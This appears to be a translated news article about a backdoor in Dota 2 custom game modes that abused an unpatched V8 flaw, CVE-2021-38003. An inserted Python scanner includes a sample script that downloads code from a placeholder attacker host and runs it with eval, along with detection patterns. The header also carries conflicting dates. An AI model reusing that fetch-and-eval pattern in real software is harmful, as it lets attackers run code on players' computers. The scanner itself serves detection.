April 26, 2025

Valve developers ignored a vulnerability in Dota 2 for 15 months until a hacker exploited it.

February 13, 2023

The vulnerability, tracked as CVE-2021-38003, was located in Google’s open source JavaScript engine, known as V8, which Dota 2 uses. Google’s developers patched it in October 2021, but Valve did not update the copy of the engine shipped with the game, leaving the vulnerability in place. A month ago, researchers at Avast warned Valve that the critical vulnerability was being actively targeted.

What happened

A hacker took advantage of Valve’s carelessness by creating a special game mode that exploited the vulnerability. He later created three more of these.

The first game mode appears to have been created to test whether the vulnerability could be exploited. It embedded exploit code for CVE-2021-38003 that was easy to detect. It was called “test plugin plz ignore” (ID 1556548695), and its description encouraged people not to download or install it.

The other three:

  • “No annoying heroes” (ID 2776998052).
  • “Special Hero Fight” (ID 2780728794).
  • “RTZ Edition X10 Take Over XP” (ID 2780559339).

The malicious code in these three newer game modes is more “advanced” and does not contain any directly visible JavaScript exploit. Instead, it carries a backdoor of about twenty lines of code. By executing arbitrary JavaScript downloaded over HTTP, the backdoor not only lets the attacker hide the exploit code, but also lets him update it at any time without having to update the entire custom game mode.

The server that these three mods contacted was already down when Avast researchers discovered them. Presumably the developer himself decided to stop using the vulnerability.

How the backdoor worked:

  • The victim enters a match in one of the malicious game modes.
  • The game loads normally, but in the background the malicious JavaScript communicates with the game mode’s server.
  • The game mode server code contacts the backdoor’s C&C server, downloads a piece of JavaScript code (probably an exploit for CVE-2021-38003), and returns the downloaded code to the victim.
  • The victim’s client dynamically executes the downloaded JavaScript. If this were an exploit for CVE-2021-38003, it would have led to code execution on the victim’s computer.
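The backdoor pattern described above (a script that fetches code over HTTP and executes it dynamically) can be triaged statically. The scanner below is an added example, not code from Avast, Valve or the mods themselves; the two sample scripts are constructed, and the hostname in them is a placeholder.

```python
import re

# Constructed sample scripts (not the real custom game modes' code).
BENIGN_SCRIPT = """
// Ordinary game-mode logic: no remote code, no dynamic execution
function OnHeroSpawned(event) {
    var hero = event.hero;
    hero.startingGold = 600;
}
"""

BACKDOOR_LIKE_SCRIPT = """
// Fetches a script over plain HTTP and executes whatever comes back
var updateUrl = "http://cnc.example.invalid/payload.js";
var req = new XMLHttpRequest();
req.open("GET", updateUrl, true);
req.onload = function () { eval(req.responseText); };
req.send();
"""

# Indicators of the pattern described in the article: a remote HTTP(S) URL
# plus a dynamic-execution primitive that can run downloaded text as code.
REMOTE_URL = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
DYNAMIC_EXEC = re.compile(
    r"\beval\s*\(|new\s+Function\s*\(|set(?:Timeout|Interval)\s*\(\s*['\"]"
)


def triage_script(name, source):
    """Return a finding dict; 'suspicious' is set only when both indicators co-occur."""
    urls = REMOTE_URL.findall(source)
    exec_hits = [m.group(0) for m in DYNAMIC_EXEC.finditer(source)]
    return {
        "name": name,
        "remote_urls": urls,
        "dynamic_exec": exec_hits,
        "suspicious": bool(urls) and bool(exec_hits),
    }


def triage_all(scripts):
    """Scan a {name: source} mapping and return the names that need manual review."""
    return [name for name, src in scripts.items() if triage_script(name, src)["suspicious"]]


if __name__ == "__main__":
    samples = {"benign": BENIGN_SCRIPT, "backdoor_like": BACKDOOR_LIKE_SCRIPT}
    for flagged in triage_all(samples):
        print("review:", flagged, triage_script(flagged, samples[flagged]))
```

Scripts that only reference a URL, or only use eval, are reported but not flagged, so the output is a review queue rather than a verdict.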

Researchers say it is impossible to determine exactly what the developer’s intentions were with these mods, but Avast’s announcement gives two reasons to suspect that this was not entirely well-intentioned research.

“First, the attacker did not report the vulnerability to Valve (which is generally considered a good thing). Second, the attacker tried to hide the vulnerability in a secret backdoor,” the researchers explained.

Valve officials did not respond to requests for comment for this story.

Source: 24 Tv
